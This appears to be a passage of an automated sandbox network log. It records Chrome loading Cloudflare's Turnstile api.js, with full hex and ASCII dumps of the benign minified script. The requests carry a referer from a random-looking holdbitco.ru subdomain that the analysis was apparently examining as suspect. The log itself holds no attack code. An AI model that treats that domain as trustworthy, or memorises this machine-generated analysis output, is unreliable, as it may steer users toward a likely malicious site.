                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              41104.17.2.184443192.168.2.1649786C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC569INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:37 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                                                                              location: /turnstile/v0/g/c359bc3d/api.js?render=explicit
                                                                                                                                                                                                                                                                                                              cache-control: max-age=300, public
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd3f8ae563938-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC569INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              42192.168.2.1649788104.17.2.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC569OUTGET /turnstile/v0/g/c359bc3d/api.js?render=explicit HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              43104.17.2.184443192.168.2.1649788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC570INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:38 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                              Content-Length: 34170
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd3fb5a95056c-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC570INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 4b 65 28 65 2c 6e 2c 69 2c 66 2c 75 2c 79 2c 6d 29 7b 74 72 79 7b 76 61 72 20 6c 3d 65 5b 79 5d 28 6d 29 2c 64 3d 6c 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 68 29 7b 69 28 68 29 3b 72 65 74 75 72 6e 7d 6c 2e 64 6f 6e 65 3f 6e 28 64 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 64 29 2e 74 68 65 6e 28 66 2c 75 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 74 68 69 73 2c 69 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 66 2c 75 29 7b 76 61 72 20 79 3d 65 2e 61 70 70 6c 79 28 6e 2c 69 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(function(){function Ke(e,n,i,f,u,y,m){try{var l=e[y](m),d=l.value}catch(h){i(h);return}l.done?n(d):Promise.resolve(d).then(f,u)}function Ze(e){return function(){var n=this,i=arguments;return new Promise(function(f,u){var y=e.apply(n,i);funct
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC571INData Raw: 21 31 2c 6d 2c 6c 3b 74 72 79 7b 66 6f 72 28 69 3d 69 2e 63 61 6c 6c 28 65 29 3b 21 28 75 3d 28 6d 3d 69 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 66 2e 70 75 73 68 28 6d 2e 76 61 6c 75 65 29 2c 21 28 6e 26 26 66 2e 6c 65 6e 67 74 68 3d 3d 3d 6e 29 29 3b 75 3d 21 30 29 3b 7d 63 61 74 63 68 28 64 29 7b 79 3d 21 30 2c 6c 3d 64 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 75 26 26 69 2e 72 65 74 75 72 6e 21 3d 6e 75 6c 6c 26 26 69 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 79 29 74 68 72 6f 77 20 6c 7d 7d 72 65 74 75 72 6e 20 66 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 74 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: !1,m,l;try{for(i=i.call(e);!(u=(m=i.next()).done)&&(f.push(m.value),!(n&&f.length===n));u=!0);}catch(d){y=!0,l=d}finally{try{!u&&i.return!=null&&i.return()}finally{if(y)throw l}}return f}}function rt(){throw new TypeError("Invalid attempt to destructure n
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC572INData Raw: 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 20 37 3a 76 3d 75 2e 6f 70 73 2e 70 6f 70 28 29 2c 75 2e 74 72 79 73 2e 70 6f 70 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 64 65 66 61 75 6c 74 3a 69 66 28 6c 3d 75 2e 74 72 79 73 2c 21 28 6c 3d 6c 2e 6c 65 6e 67 74 68 3e 30 26 26 6c 5b 6c 2e 6c 65 6e 67 74 68 2d 31 5d 29 26 26 28 76 5b 30 5d 3d 3d 3d 36 7c 7c 76 5b 30 5d 3d 3d 3d 32 29 29 7b 75 3d 30 3b 63 6f 6e 74 69 6e 75 65 7d 69 66 28 76 5b 30 5d 3d 3d 3d 33 26 26 28 21 6c 7c 7c 76 5b 31 5d 3e 6c 5b 30 5d 26 26 76 5b 31 5d 3c 6c 5b 33 5d 29 29 7b 75 2e 6c 61 62 65 6c 3d 76 5b 31 5d 3b 62 72 65 61 6b 7d 69 66 28 76 5b 30 5d 3d 3d 3d 36 26 26 75 2e 6c 61 62 65 6c 3c 6c 5b 31 5d 29 7b 75 2e 6c 61 62 65 6c 3d 6c 5b 31 5d 2c 6c 3d 76 3b 62 72 65 61 6b 7d 69 66 28 6c 26
                                                                                                                                                                                                                                                                                                              Data Ascii: ;continue;case 7:v=u.ops.pop(),u.trys.pop();continue;default:if(l=u.trys,!(l=l.length>0&&l[l.length-1])&&(v[0]===6||v[0]===2)){u=0;continue}if(v[0]===3&&(!l||v[1]>l[0]&&v[1]<l[3])){u.label=v[1];break}if(v[0]===6&&u.label<l[1]){u.label=l[1],l=v;break}if(l&
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC574INData Raw: 63 75 74 65 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 44 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 5f 46 41 49 4c 53 3d 22 61 6c 77 61 79 73 2d 66 61 69 6c 73 22 2c 65 2e 53 4f 4d 45 54 49 4d 45 53 5f 46 41 49 4c 53 3d 22 73 6f 6d 65 74 69 6d 65 73 2d 66 61 69 6c 73 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 44 65 7c 7c 28 44 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 65 28 65 29 7b 72 65 74 75 72 6e 20 55 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 29 7b 72 65 74 75 72 6e 20 55 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75
                                                                                                                                                                                                                                                                                                              Data Ascii: cute"})(Q||(Q={}));var De;(function(e){e.ALWAYS_FAILS="always-fails",e.SOMETIMES_FAILS="sometimes-fails",e.TOO_SLOW="too-slow",e.OTHER="other"})(De||(De={}));function Me(e){return U(["auto","dark","light"],e)}function Ue(e){return U(["auto","never"],e)}fu
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC575INData Raw: 66 75 6e 63 74 69 6f 6e 28 66 2c 75 29 7b 72 65 74 75 72 6e 20 66 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 75 2c 66 7d 2c 71 28 65 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 5f 74 28 65 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 20 6e 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 6e 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 26 26 6e 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62
                                                                                                                                                                                                                                                                                                              Data Ascii: function(f,u){return f.__proto__=u,f},q(e,n)}function _t(e,n){if(typeof n!="function"&&n!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(n&&n.prototype,{constructor:{value:e,writable:!0,configurab
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC576INData Raw: 75 2c 66 29 7d 2c 45 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 26 26 28 6b 28 6e 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 6e 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 6e 3a 78 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 78 74 28 65 29 7b 76 61 72 20 6e 3d 62 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 66 3d 4a 28 65 29 2c 75 3b 69 66 28 6e 29 7b 76 61 72 20 79 3d 4a 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 75 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 66 2c 61 72 67 75 6d 65 6e 74 73 2c 79 29 7d 65 6c 73 65 20 75 3d 66 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 67 74 28 74 68 69
                                                                                                                                                                                                                                                                                                              Data Ascii: u,f)},Ee(e)}function gt(e,n){return n&&(k(n)==="object"||typeof n=="function")?n:xe(e)}function xt(e){var n=be();return function(){var f=J(e),u;if(n){var y=J(this).constructor;u=Reflect.construct(f,arguments,y)}else u=f.apply(this,arguments);return gt(thi
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC578INData Raw: 6f 6e 74 69 6e 75 65 7d 69 66 28 28 64 2e 69 73 45 78 65 63 75 74 69 6e 67 7c 7c 21 64 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 7c 7c 64 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 26 26 21 64 2e 69 73 53 74 61 6c 65 26 26 21 64 2e 69 73 45 78 65 63 75 74 65 64 29 26 26 64 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 21 3d 3d 30 26 26 64 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 3c 64 2e 77 61 74 63 68 63 61 74 2e 73 65 71 2d 31 2d 56 74 29 7b 64 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 3d 30 2c 64 2e 77 61 74 63 68 63 61 74 2e 73 65 71 3d 30 2c 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 54 75 72 6e 73 74 69 6c 65 20 57 69 64 67 65 74 20 73 65 65 6d 20 74 6f 20 68 61 76 65 20 63 72 61 73 68
                                                                                                                                                                                                                                                                                                              Data Ascii: ontinue}if((d.isExecuting||!d.isInitialized||d.isInitialized&&!d.isStale&&!d.isExecuted)&&d.watchcat.lastAckedSeq!==0&&d.watchcat.lastAckedSeq<d.watchcat.seq-1-Vt){d.watchcat.lastAckedSeq=0,d.watchcat.seq=0,console.log("Turnstile Widget seem to have crash
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC579INData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 6c 2e 69 64 3d 22 63 66 2d 66 72 2d 69 64 22 2c 6c 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 43 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 34 35 30 70 78 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 33 34 30 70 78 22 2c 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 32 30 22 2c 6c 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 31 70 78 22 2c 6c 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 43 6f 6c 6f 72 3d 22 23 30 30 30 22 2c 6c 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 53 74 79 6c 65 3d 22 73 6f 6c 69 64 22 2c 6c 2e 73
                                                                                                                                                                                                                                                                                                              Data Ascii: cf-turnstile-feedback",l.id="cf-fr-id",l.style.borderColor="#000000",l.style.width="450px",l.style.height="340px",l.style.position="absolute",l.style.zIndex="21474836420",l.style.borderWidth="1px",l.style.borderColor="#000",l.style.borderStyle="solid",l.s
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC580INData Raw: 66 69 6c 6c 22 2c 22 23 61 61 61 61 61 61 22 29 2c 76 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 2d 77 69 64 74 68 22 2c 22 30 22 29 2c 68 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 76 29 3b 76 61 72 20 77 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 22 6c 69 6e 65 22 29 3b 77 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 2d 77 69 64 74 68 22 2c 22 33 22 29 2c 77 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 22 2c 22 23 66 66 66 22 29 2c 77 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 66 69 6c 6c 22 2c 22 6e 6f 6e 65 22 29 2c 77 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 31 22 2c 22
                                                                                                                                                                                                                                                                                                              Data Ascii: fill","#aaaaaa"),v.setAttribute("stroke-width","0"),h.appendChild(v);var w=document.createElementNS("http://www.w3.org/2000/svg","line");w.setAttribute("stroke-width","3"),w.setAttribute("stroke","#fff"),w.setAttribute("fill","none"),w.setAttribute("x1","
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC582INData Raw: 2c 27 22 20 6f 72 20 22 27 29 2e 63 6f 6e 63 61 74 28 57 2e 4e 4f 52 4d 41 4c 2c 27 22 2c 20 67 6f 74 20 22 27 29 2e 63 6f 6e 63 61 74 28 66 2c 27 22 27 29 2c 32 38 31 37 29 3b 63 61 73 65 20 57 2e 4e 4f 52 4d 41 4c 3a 65 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 33 30 30 70 78 22 2c 65 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 36 35 70 78 22 3b 62 72 65 61 6b 7d 62 72 65 61 6b 3b 63 61 73 65 20 4c 2e 49 4e 56 49 53 49 42 4c 45 3a 65 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 22 2c 65 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 22 2c 65 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 65 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 2c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22
                                                                                                                                                                                                                                                                                                              Data Ascii: ,'" or "').concat(W.NORMAL,'", got "').concat(f,'"'),2817);case W.NORMAL:e.style.width="300px",e.style.height="65px";break}break;case L.INVISIBLE:e.style.width="0",e.style.height="0",e.style.position="absolute",e.style.visibility="hidden",e.setAttribute("
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC583INData Raw: 29 2c 63 2e 69 73 45 78 65 63 75 74 65 64 3d 21 30 2c 63 2e 69 73 45 78 65 63 75 74 69 6e 67 3d 21 30 29 3b 76 61 72 20 72 2c 73 3d 61 3f 30 3a 31 65 33 2a 32 2b 28 28 72 3d 63 2e 70 61 72 61 6d 73 5b 22 72 65 74 72 79 2d 69 6e 74 65 72 76 61 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 72 21 3d 3d 76 6f 69 64 20 30 3f 72 3a 30 29 3b 63 2e 72 65 74 72 79 54 69 6d 65 6f 75 74 3d 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6d 28 74 29 7d 2c 73 29 7d 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 74 2c 61 29 7b 69 66 28 63 2e 72 65 73 70 6f 6e 73 65 3d 3d 3d 76 6f 69 64 20 30 29 7b 70 28 22 5b 49 6e 74 65 72 6e 61 6c 20 45 72 72 6f 72 5d 20 57 69 64 67 65 74 20 77 61 73 20 63 6f 6d 70 6c 65 74 65 64 20 62 75 74 20 6e 6f 20
                                                                                                                                                                                                                                                                                                              Data Ascii: ),c.isExecuted=!0,c.isExecuting=!0);var r,s=a?0:1e3*2+((r=c.params["retry-interval"])!==null&&r!==void 0?r:0);c.retryTimeout=window.setTimeout(function(){m(t)},s)}},n=function(c,t,a){if(c.response===void 0){p("[Internal Error] Widget was completed but no
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC584INData Raw: 43 6f 6e 73 69 64 65 72 20 72 65 6e 64 65 72 69 6e 67 20 61 20 6e 65 77 20 77 69 64 67 65 74 20 69 66 20 79 6f 75 20 77 61 6e 74 20 74 6f 20 63 68 61 6e 67 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 70 61 72 61 6d 65 74 65 72 73 20 22 29 2e 63 6f 6e 63 61 74 28 72 2e 6a 6f 69 6e 28 22 2c 22 29 29 2c 33 36 31 38 29 3b 72 65 74 75 72 6e 7d 69 66 28 74 2e 61 63 74 69 6f 6e 29 7b 69 66 28 21 7a 65 28 74 2e 61 63 74 69 6f 6e 29 29 7b 70 28 27 49 6e 76 61 6c 69 64 20 69 6e 70 75 74 20 66 6f 72 20 6f 70 74 69 6f 6e 61 6c 20 70 61 72 61 6d 65 74 65 72 20 22 61 63 74 69 6f 6e 22 2c 20 67 6f 74 20 22 27 2e 63 6f 6e 63 61 74 28 74 2e 61 63 74 69 6f 6e 2c 27 22 27 29 2c 33 36 30 34 29 3b 72 65 74 75 72 6e 7d 63 2e 61 63 74 69 6f 6e 3d 74 2e 61 63 74 69 6f 6e 7d
                                                                                                                                                                                                                                                                                                              Data Ascii: Consider rendering a new widget if you want to change the following parameters ").concat(r.join(",")),3618);return}if(t.action){if(!ze(t.action)){p('Invalid input for optional parameter "action", got "'.concat(t.action,'"'),3604);return}c.action=t.action}
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC586INData Raw: 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 22 29 2c 33 33 33 30 29 3b 72 65 74 75 72 6e 7d 69 66 28 61 2e 70 61 72 61 6d 73 2e 61 70 70 65 61 72 61 6e 63 65 3d 3d 3d 56 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 26 26 41 74 28 73 29 2c 61 2e 70 61 72 61 6d 73 2e 73 69 74 65 6b 65 79 3d 3d 3d 6e 75 6c 6c 29 7b 70 28 22 55 6e 65 78 70 65 63 74 65 64 20 45 72 72 6f 72 3a 20 53 69 74 65 6b 65 79 20 69 73 20 6e 75 6c 6c 22 2c 33 33 34 37 29 3b 72 65 74 75 72 6e 7d 76 61 72 20 6f 3b 73 2e 73 72 63 3d 49 74 28 74 2c 61 2e 70 61 72 61 6d 73 2e 73 69 74 65 6b 65 79 2c 61 2e 70 61 72 61 6d 73 2c 28 6f 3d 61 2e 72 63 56 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 24 29 2c 59 65 28 72 29 2c 61 2e 72 65 74 72 79 54 69 6d 65 6f 75 74 26 26
                                                                                                                                                                                                                                                                                                              Data Ascii: as not found."),3330);return}if(a.params.appearance===V.INTERACTION_ONLY&&At(s),a.params.sitekey===null){p("Unexpected Error: Sitekey is null",3347);return}var o;s.src=It(t,a.params.sitekey,a.params,(o=a.rcV)!==null&&o!==void 0?o:$),Ye(r),a.retryTimeout&&
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC587INData Raw: 4f 3b 76 61 72 20 44 3b 6f 2e 72 65 74 72 79 3d 28 44 3d 6f 2e 72 65 74 72 79 29 21 3d 3d 6e 75 6c 6c 26 26 44 21 3d 3d 76 6f 69 64 20 30 3f 44 3a 6f 65 2e 41 55 54 4f 3b 76 61 72 20 53 3b 6f 2e 65 78 65 63 75 74 69 6f 6e 3d 28 53 3d 6f 2e 65 78 65 63 75 74 69 6f 6e 29 21 3d 3d 6e 75 6c 6c 26 26 53 21 3d 3d 76 6f 69 64 20 30 3f 53 3a 6e 65 2e 52 45 4e 44 45 52 3b 76 61 72 20 6a 3b 6f 2e 61 70 70 65 61 72 61 6e 63 65 3d 28 6a 3d 6f 2e 61 70 70 65 61 72 61 6e 63 65 29 21 3d 3d 6e 75 6c 6c 26 26 6a 21 3d 3d 76 6f 69 64 20 30 3f 6a 3a 56 2e 41 4c 57 41 59 53 3b 76 61 72 20 65 65 3b 6f 5b 22 72 65 74 72 79 2d 69 6e 74 65 72 76 61 6c 22 5d 3d 2b 28 28 65 65 3d 6f 5b 22 72 65 74 72 79 2d 69 6e 74 65 72 76 61 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 65 65 21 3d 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: O;var D;o.retry=(D=o.retry)!==null&&D!==void 0?D:oe.AUTO;var S;o.execution=(S=o.execution)!==null&&S!==void 0?S:ne.RENDER;var j;o.appearance=(j=o.appearance)!==null&&j!==void 0?j:V.ALWAYS;var ee;o["retry-interval"]=+((ee=o["retry-interval"])!==null&&ee!==
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC588INData Raw: 2c 22 2c 20 65 78 70 65 63 74 65 64 20 65 69 74 68 65 72 3a 20 61 75 74 6f 2c 20 6f 72 20 61 6e 20 49 53 4f 20 36 33 39 2d 31 20 74 77 6f 2d 6c 65 74 74 65 72 20 6c 61 6e 67 75 61 67 65 20 63 6f 64 65 20 28 65 2e 67 2e 20 65 6e 29 20 6f 72 20 6c 61 6e 67 75 61 67 65 20 61 6e 64 20 63 6f 75 6e 74 72 79 20 63 6f 64 65 20 28 65 2e 67 2e 20 65 6e 2d 55 53 29 22 29 2c 33 35 39 33 29 3b 72 65 74 75 72 6e 7d 69 66 28 21 42 65 28 6f 2e 61 70 70 65 61 72 61 6e 63 65 29 29 7b 70 28 27 55 6e 6b 6e 6f 77 6e 20 61 70 70 65 61 72 61 6e 63 65 20 76 61 6c 75 65 3a 20 22 27 2e 63 6f 6e 63 61 74 28 6f 2e 61 70 70 65 61 72 61 6e 63 65 2c 22 2c 20 65 78 70 65 63 74 65 64 20 65 69 74 68 65 72 3a 20 27 61 6c 77 61 79 73 27 2c 20 27 65 78 65 63 75 74 65 27 2c 20 6f 72 20 27 69
                                                                                                                                                                                                                                                                                                              Data Ascii: ,", expected either: auto, or an ISO 639-1 two-letter language code (e.g. en) or language and country code (e.g. en-US)"),3593);return}if(!Be(o.appearance)){p('Unknown appearance value: "'.concat(o.appearance,", expected either: 'always', 'execute', or 'i
